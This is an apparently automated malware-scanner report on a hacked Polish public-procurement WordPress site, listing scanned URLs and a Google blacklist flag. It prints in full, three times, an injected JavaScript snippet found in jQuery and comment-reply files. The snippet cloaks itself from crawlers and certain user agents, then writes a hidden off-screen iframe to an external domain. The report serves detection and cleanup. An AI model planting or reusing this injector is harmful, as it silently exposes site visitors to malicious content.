New scan:

Malware Scanner report for zamowienia-publiczne.net

Malicious/Suspicious/Total urls checked
3/0/16
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "zamowienia-publiczne.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
3/0/3
3 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=zamowienia-publiczne.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://zamowienia-publiczne.net/
200 OK
Content-Length: 73057
Content-Type: text/html
clean
http://zamowienia-publiczne.net/wp-includes/js/jquery/jquery.js?ver=1.10.2
200 OK
Content-Length: 94000
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: rayanet.vhfdental.com

...[51 bytes skipped]...
ipmoture_aurma".replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)")),b=void 0===(a?decodeURIComponent(a[1]):void 0),c="Linux;Windows NT 6.3;Windows NT 6.2;rv:11.0;AppleWebKit;Android;Googlebot;IEMobile;Yandex".split(";"),d=!1,e;for(e in c){var f=0;if(-1!==(f=(navigator.userAgent+"").toLowerCase().indexOf((c[e]+"").toLowerCase(),void 0))&&f){d=!0;break}}
!d&&b&&(document.write('<iframe src="http://rayanet.vhfdental.com/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141"></iframe>'),document.cookie="ipmoture_aurma=1; path=/; expires="+(new Date((new Date).getTime()+1728E5)).toUTCString());
(function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f="1.10.2",d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c
...[3197 bytes skipped]...

Decoded script:


<iframe src="http://rayanet.vhfdental.com/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141"></iframe>

Malicious iFrame found.
size: 141x141     
src: http://rayanet.vhfdental.com/simplemist17.html?k
This URL is marked by Google as suspicious

<iframe src="http://rayanet.vhfdental.com/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141">

http://zamowienia-publiczne.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 8115
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: rayanet.vhfdental.com

...[51 bytes skipped]...
ipmoture_aurma".replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)")),b=void 0===(a?decodeURIComponent(a[1]):void 0),c="Linux;Windows NT 6.3;Windows NT 6.2;rv:11.0;AppleWebKit;Android;Googlebot;IEMobile;Yandex".split(";"),d=!1,e;for(e in c){var f=0;if(-1!==(f=(navigator.userAgent+"").toLowerCase().indexOf((c[e]+"").toLowerCase(),void 0))&&f){d=!0;break}}
!d&&b&&(document.write('<iframe src="http://rayanet.vhfdental.com/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141"></iframe>'),document.cookie="ipmoture_aurma=1; path=/; expires="+(new Date((new Date).getTime()+1728E5)).toUTCString());

jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&
...[3249 bytes skipped]...

Decoded script:


<iframe src="http://rayanet.vhfdental.com/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141"></iframe>

Malicious iFrame found.
size: 141x141     
src: http://rayanet.vhfdental.com/simplemist17.html?k
This URL is marked by Google as suspicious

<iframe src="http://rayanet.vhfdental.com/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141">

http://zamowienia-publiczne.net/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=3.8.1
200 OK
Content-Length: 33
Content-Type: application/javascript
clean
http://zamowienia-publiczne.net//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Sat, 11 Oct 2014 21:09:33 GMT
Pragma: no-cache
Location: http://zamowienia-publiczne.net/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://zamowienia-publiczne.net/xmlrpc.php
clean
http://zamowienia-publiczne.net/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
404 Not Found
Content-Length: 25897
Content-Type: text/html
clean
http://zamowienia-publiczne.net/wp-content/themes/twentyfourteen/js/functions.js?ver=20131209
200 OK
Content-Length: 3380
Content-Type: application/javascript
clean
http://zamowienia-publiczne.net/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-pl.js?ver=2.5.9
200 OK
Content-Length: 7917
Content-Type: application/javascript
clean
http://zamowienia-publiczne.net/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.5.9
200 OK
Content-Length: 69692
Content-Type: application/javascript
clean
http://zamowienia-publiczne.net/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.5.9
200 OK
Content-Length: 2864
Content-Type: application/javascript
clean
http://zamowienia-publiczne.net/aktualnosci-2/
200 OK
Content-Length: 55609
Content-Type: text/html
clean
http://zamowienia-publiczne.net/wp-includes/js/comment-reply.min.js?ver=3.8.1
200 OK
Content-Length: 1672
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: rayanet.vhfdental.com

...[51 bytes skipped]...
ipmoture_aurma".replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)")),b=void 0===(a?decodeURIComponent(a[1]):void 0),c="Linux;Windows NT 6.3;Windows NT 6.2;rv:11.0;AppleWebKit;Android;Googlebot;IEMobile;Yandex".split(";"),d=!1,e;for(e in c){var f=0;if(-1!==(f=(navigator.userAgent+"").toLowerCase().indexOf((c[e]+"").toLowerCase(),void 0))&&f){d=!0;break}}
!d&&b&&(document.write('<iframe src="http://rayanet.vhfdental.com/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141"></iframe>'),document.cookie="ipmoture_aurma=1; path=/; expires="+(new Date((new Date).getTime()+1728E5)).toUTCString());
var addComment={moveForm:function(a,b,c,d){var e,f=this,g=f.I(a),h=f.I(c),i=f.I("cancel-comment-reply-link"),j=f.I("comment_parent"),k=f.I("comment_post_ID");if(g&&h&am
...[629 bytes skipped]...

Decoded script:


<iframe src="http://rayanet.vhfdental.com/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141"></iframe>

Malicious iFrame found.
size: 141x141     
src: http://rayanet.vhfdental.com/simplemist17.html?k
This URL is marked by Google as suspicious

<iframe src="http://rayanet.vhfdental.com/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141">

http://zamowienia-publiczne.net/mediacje/
200 OK
Content-Length: 33973
Content-Type: text/html
clean
http://zamowienia-publiczne.net/wzory-dokumentow/
200 OK
Content-Length: 43589
Content-Type: text/html
clean
http://zamowienia-publiczne.net/wzory-dokumentow/siwz-na-uslugi/
200 OK
Content-Length: 30383
Content-Type: text/html
clean
http://zamowienia-publiczne.net/wzory-dokumentow/siwz-na-dostawy/
200 OK
Content-Length: 30660
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: zamowienia-publiczne.net

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Oct 2014 21:09:28 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Link: <http://wp.me/>; rel=shortlink
X-Pingback: http://zamowienia-publiczne.net/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: zamowienia-publiczne.net
Referer: http://www.google.com/search?q=zamowienia-publiczne.net

Result:
The result is similar to the first query. There are no suspicious redirects found.